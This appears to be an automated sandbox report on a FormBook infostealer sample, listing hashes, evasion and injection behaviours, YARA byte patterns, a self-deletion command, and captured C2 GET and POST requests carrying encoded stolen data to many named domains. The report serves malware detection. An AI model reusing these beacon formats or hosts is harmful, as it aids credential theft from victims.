Analysis Report Scn14.092020.scr

Overview

General Information

Sample Name: Scn14.092020.scr (renamed file extension from scr to exe)
Analysis ID: 285167
MD5: f3dcebdfd88e627e79f078f41a676b76
SHA1: 7837347cbb14d59cc979731c88011df78dd62ae4
SHA256: 6af2c88ffcb5d4290c1bef29781f58505d75654ea54d42ee04d59b93e723c799

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Hides threads from debuggers
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scn14.092020.exe (PID: 4784 cmdline: 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3DCEBDFD88E627E79F078F41A676B76)
    • Scn14.092020.exe (PID: 6292 cmdline: C:\Users\user\Desktop\Scn14.092020.exe MD5: F3DCEBDFD88E627E79F078F41A676B76)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5656 cmdline: /c del 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
    • 0x160ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16008:$sqlite3text: 68 38 2A 90 C5
    • 0x1612d:$sqlite3text: 68 38 2A 90 C5
    • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Scn14.092020.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Scn14.092020.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Scn14.092020.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x153d9:$sqlite3step: 68 34 1C 7B E1
        • 0x154ec:$sqlite3step: 68 34 1C 7B E1
        • 0x15408:$sqlite3text: 68 38 2A 90 C5
        • 0x1552d:$sqlite3text: 68 38 2A 90 C5
        • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15543:$sqlite3blob: 68 53 D8 7F 8C
1.2.Scn14.092020.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Scn14.092020.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Scn14.092020.exe | Virustotal: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 1.2.Scn14.092020.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C7F460 FindFirstFileW,FindNextFileW,FindClose | 6_2_02C7F460
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C7F459 FindFirstFileW,FindNextFileW,FindClose | 6_2_02C7F459
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C7F585 FindFirstFileW,FindNextFileW,FindClose | 6_2_02C7F585
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 4x nop then pop edi | 1_2_00415001
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 4x nop then pop edi | 1_2_0040C119
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop edi | 6_2_02C85001
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop edi | 6_2_02C7C119

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49743
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49772
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49787
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1ESascm7BSDz HTTP/1.1 | Host: www.nola3d.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9YvQ74iaK1ga&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.keebcat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vpvmwenp9VWv HTTP/1.1 | Host: www.chehol.directory | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTluj46t1OBa8z&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.jblmhomestore.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=iaRy2CcIG08yRATteF/h4niYl8g0zTtWlPvlrUXVcPKgWlu5QOCPyX+cRpPsLMouC6x2 HTTP/1.1 | Host: www.theghostfestival.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjDU5XNQldOlk&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.thebardi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHvJayoJ2l/qV HTTP/1.1 | Host: www.martjeje2.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JagFD9t222TfN&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.isabellelinhnguyen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMTXo2uu4NyLJ HTTP/1.1 | Host: www.revolucaomindfulness.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=rlkmmCaXt+AMyrw/MBwq/BSknyHni0kPKYXwYo5rBrAjCFj+y3ydrJyfUTRA3QRnBG+G&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.krewebijoux.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=6KwpPXUiwFX7ZBA9OodNm3YLSATd2KUq4kH3sDUsuv0xVz64ikFWE+1HwWsjSUW/OVbp HTTP/1.1 | Host: www.environmentsafetymemphis.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA90d4Z59dcBU3&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.nittayabeauty.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFSfl3ZRuG6Nl HTTP/1.1 | Host: www.ashleygrady.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?vP=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qOyDoR5/Ss4I&2de=Rzu4ZZ-XVT HTTP/1.1 | Host: www.aktivasi-asuransi-bukalapak.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 209.99.40.222 209.99.40.222
Source: Joe Sandbox View | IP Address: 208.91.197.91 208.91.197.91
Source: Joe Sandbox View | IP Address: 208.91.197.91 208.91.197.91
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View | ASN Name: CYBERDYNELR CYBERDYNELR
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.keebcat.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.keebcat.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.keebcat.com/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp9n962ppcfHGErLNnetTncS5hJHfvsWm6FhgaTKDYkzGpbq0~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOfMdJxtNg8etUtts1uw).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.chehol.directory | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.chehol.directory | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.chehol.directory/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=gg1ok2Cv51TgYIkZWdpg21eOlrnFJxcYmNcqoolGrlgjFr3oIBl1rnzA96rL(_(722PgPZhybM9f5J9pvy~b5smvGOF6mCioaOt-9ovMNLGN5sD1G-tXRLr2z-vRbWqfUvVTYhQaWipbKRjxjlfS4vfnQ0RU841dc0RpsYHVEeTLj3cWbrkORL0XDKqnLWZUUNlCgfpT93sHSMfCmsbmQthd~Cgz9no3f4nyjD8G1OPKNyjfj_hD4LMPbiOdhH4G8F8RUGyTIQqa0h3CVdtbPotdJH3MUV0ZBvcNxyIIyL7lHD8gn9u4WgttE3nHwj51QAd6cgcCCyh80511fGmhA6D3cv4p2KbmEECdiUY-gZPYRktmzKtZTpCU7A677_G4lkke3C0DdGm1rCTX5g).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.jblmhomestore.net | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.jblmhomestore.net | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.jblmhomestore.net/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=aGrG6ePBUzrR0czb4VpMrdl1WTPmu4vSJ0jIP-DzHyodc7hxKCJYpSID~Mj6nsBODJ9DvwkGnULY0NfU7CGDQP2jUAqk~oyhwAIhciTZaWk72mStk8IXcIpGPb(H(b~7VjAW4bsMHEDPqPUncTeFOzm-HbpG~7g4p3~a(pjanwpRsJxuwb8SjOJ-7vkce1gj(gg-y42MKzIiWWmFlSQCcLfC2QKnut02rCjBv3tgUdtT~1~epoIdSibFo_5C9meFUnsnPKpJ1zhZ28awJUKg(Y2L2A166gcjTeIX8_98~6pb3ZeBKLiiYFR30PGJcXgQ2VZ3UDmY9VlY~PvvBvYg8Lj4l0VAn9E8w4QqL4bUVEkjS_DaGZJQQjWYJwbfQpqR5Ox_pW4tmOLkE_WoiQ).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.theghostfestival.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.theghostfestival.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.theghostfestival.com/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=tYlIoi4EPz8aRQuYChr_uiacuvMA9X5PhLC33TPKXdS9Q0K8Ar3ehyPwHcXyMNYTCK8PrSHIbooqGc96lklccWHCZbq2faBH8TprS2jYdnx_D8lKF7sZCuw_kurbLbAwJFQIErtYh-ZhUlEC8_KukWa7MFI-M66q2BkJcXySkI5GqgcIgTqIsLpTxZW69BNlWoYYweRTbTBpLsyJgVFmusOYVICeNBOEfhQ-6aCPIBbror6-hV0c19TBfA~DZ0VMtWyEfWCUBf6VcBD9oqTXWSVUAmk3741k~HHQqq5TOmi2kEEw2FdPWEH2ZbmvwO4JH1p7D-ktVrPcNj15HQwdeW6R4-b7t_mjnJCQ74aJI93yhdkRYP1nXBsMpUdBXmLt8-yx63eyuojgKNZOFQ).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.thebardi.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.thebardi.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.thebardi.com/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=74EVgopeHwlRX3BPVCHqs6mrDAR0AyQoELw4FLpAk_SfPvMuVrDjqhTGhgEGLNggaasDLLtXUcZ5lOU66tV9t_UEZj4MfHYZBX2MBZWjFkdsDAdJBq5sP2PpIr8vBxBv1WmEgT75QMEb05Y95GhoKEPJSsY_pJrQq2DcaCo9k7L6J5h0zwFcPt8kTqVAe5cF~sHD2o4GaP5ABAywLBNtGE83QNnjIFG9e1FFPvqTLnEwtIa5(u(FaBIybrhW1nzD3QoOy887x37IeftaTSZMME0xluTCuPrAf-Bt19kMHtM2hvAKd0bUnRxey3pQ9FOqDE2B0FH20uVguELb9epSIVpAXDZZVLDDB6JP~npzHwtpNwVxSzewfzkfViOt1YiiY-CsJmi7V17kmUWjuw).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.martjeje2.info | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.martjeje2.info | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.martjeje2.info/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=4HM7N-oCB87enkYxdCuz~N5MqZVHt857fJG6k4Jtf5m2Q-wcrkINtmq4R6pIwrMUkfOZ9iqe9bjy3ITy0dbvoRFjzdU8X6XHOkBeCajL5FuUmf7bmyavhU91V1CEvtQ3jOVqsSN5VxO_Gh5eE44P9wBGIvSq5DChxWEuPbT6KuZRIDN98JAlukP2QogubBwNR9KkFMy1YFFA2TYgM5uL8nMgSM(tAcAhliVi1K06s3HvvzgVAd6DvIRE9vqxtWyujZOOGTOn(4jw(q1EcCqV(hNNPLMeIk5hKGwYuMdVU87F9S4EhrJbArY0cwdQ7aNQc0vJKaRHJ4Wiyxkj4qDPKhzZkCavtdKpw9Ev7D~HRrBbffTWEe4t9OQcyTcBApXy7qwGas9JKSaIsZkyeg).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.isabellelinhnguyen.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.isabellelinhnguyen.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.isabellelinhnguyen.com/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=SJW9ychPIpqW9TCL8JhrsNHWePXfPPKcVuW6(KzXMNfX5uTdN3(LVZWIJQFD1fDe~mGdwALuU74QkFVpVLSsSvh2BUD5wfGnLc6btTtrDfv2xCChsT23tRbjrB(nLFmRICXwT9Zxf4GJNW0GJkw9AHHstbY5eXO3QB1Ubsfov40tb_dRCZK8hbK2lj(-nDq5GsOAR8iTXMmuoQRz3ToKPvWSrlZzBRyvUUy0hRNXw0OMF3WvhDlo5wnaUVbqCkGJom9VJsdJnYZSIrZk9krHBYgdykzf3QuZ~mmLJRXCNRsnIRcUSDOzguUH21p_hW9JtEoNbvFNSjVmSDL8u8aslP0moLEieEIubTxBIqAwdS4ICPHSXCD4SRtjgupndYxz1horLy0Q2Ls2fezjxw).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.revolucaomindfulness.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.revolucaomindfulness.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.revolucaomindfulness.com/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=FbjcCpuQKSzpM2eqFZiZlt34AEYv1xuDIOVGp0KtWT3CWzX4sJHk3RIoQxL1zaSnPB6G9We2UgM1FfMNPYBar1F0fpRi8juYWee-H1yh43uwS15WkmPB(WJBWcBKw2jg3fWcplVNVl~ePy1G8nFhkLZ5kUZGChc4BmIIs0iSSPUWevZq7M0SefMiCWT2D_72ej6OYTx2(Dust4seFBs7ZHqtJVVM2FTm42R1n93IYLGB5OYAFDt6g0(2HzQU4Ms2fdvazbGNJXOY7MMKimZ_b88A9nBcq1h91AphftP5AenKyykUyTeYdN1jdfMBjznw9GpXu6ou2j1cIn~n5Cjf5rpJqq71~KYApR9NvM6GB43433ZTup9awrCe4x5QejQ622qfkafMkw0olKKtEQ).
Source: global traffic | HTTP traffic detected: POST /d9s8/ HTTP/1.1 | Host: www.krewebijoux.com | Connection: close | Content-Length: 408 | Cache-Control: no-cache | Origin: http://www.krewebijoux.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.krewebijoux.com/d9s8/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
vP=knQc4mKsost5y6lTcRhNrlDGkQjntwsTc-KyOPpuWodkPl6v2WvuovvZWxNBoihXKUb0upUKA5SOCwn4xK3ohWl892P5W0WlY4H9cmO6ffApMfUuEHThRCKCXZyqYAFbFJZxfbJcPcBxiMKkg2WFZjmXS_fohy~fWp6xTwPy1jVlmguYcMdHKQUQ9U0_drQwjCD6PlWUXqN3toyz2DqL9VKgKQ12edQl5Uo8izz6mf0Xyl(t5w2_ERY1se(bKUkFIT45OsAiE9HM2zz_FkdF4Mgxn9emYndqQpLyeveJmnFYGsrE0j1KOgvIjqll01D-0JCyGtfHubMqofdXmhSLiM794LXJXwR2GdVdPVvNZpPrRxA0JW3X8BYwB1ntxRSgflChK6qNYRUmyE9WMA).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.environmentsafetymemphis.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.environmentsafetymemphis.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.environmentsafetymemphis.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 31 49 45 54 52 7a 6b 45 77 57 50 59 50 52 64 73 4f 66 63 46 32 42 6f 49 63 43 28 66 67 49 63 4a 73 78 71 76 38 7a 45 56 76 4f 6f 33 45 43 69 4c 6c 6e 77 31 42 4c 41 79 6f 55 6b 56 4f 6c 75 64 4f 30 4f 4d 70 51 67 37 59 66 54 76 63 76 45 6e 75 6c 74 73 4f 5f 31 38 32 78 61 2d 65 72 56 4a 6d 5a 33 79 57 45 53 54 47 67 65 56 74 68 72 78 65 5f 72 56 47 44 62 36 47 49 4e 53 59 35 6a 57 31 59 68 4f 53 50 6b 5f 31 72 6d 36 70 79 63 78 52 4d 48 46 44 6c 31 68 35 48 79 2d 44 38 31 5a 57 30 68 46 41 53 35 71 32 31 4d 63 5a 51 52 4a 54 34 6a 64 65 78 56 48 74 76 43 36 59 46 70 74 28 75 67 46 35 5a 28 76 71 45 43 39 78 33 66 54 45 41 6f 38 4f 46 6d 5f 72 65 33 50 47 4c 36 76 66 52 72 43 4a 66 6c 30 64 70 73 73 57 56 49 49 64 67 42 5f 63 4a 44 6f 65 4f 45 35 4d 52 76 31 56 44 36 4b 64 39 65 57 52 46 36 4e 50 30 56 4d 30 43 35 62 6c 61 6e 47 53 33 42 6b 71 43 49 6f 45 70 4c 4e 58 77 70 48 53 57 76 57 31 30 33 42 59 55 61 56 33 78 75 54 75 68 31 6d 34 44 6c 51 32 49 36 34 5a 51 57 31 59 61 32 47 36 4d 7e 32 43 30 59 32 63 70 77 78 4a 67 35 6a 42 71 55 4f 56 66 61 4a 45 30 7a 5a 71 5a 6d 62 45 62 74 69 56 70 4b 48 74 59 6b 41 4d 6e 58 31 35 56 4e 4d 55 76 4a 45 36 6b 74 30 78 70 42 52 28 4d 38 35 71 41 29 2e 00 00 00 00 00 00 00 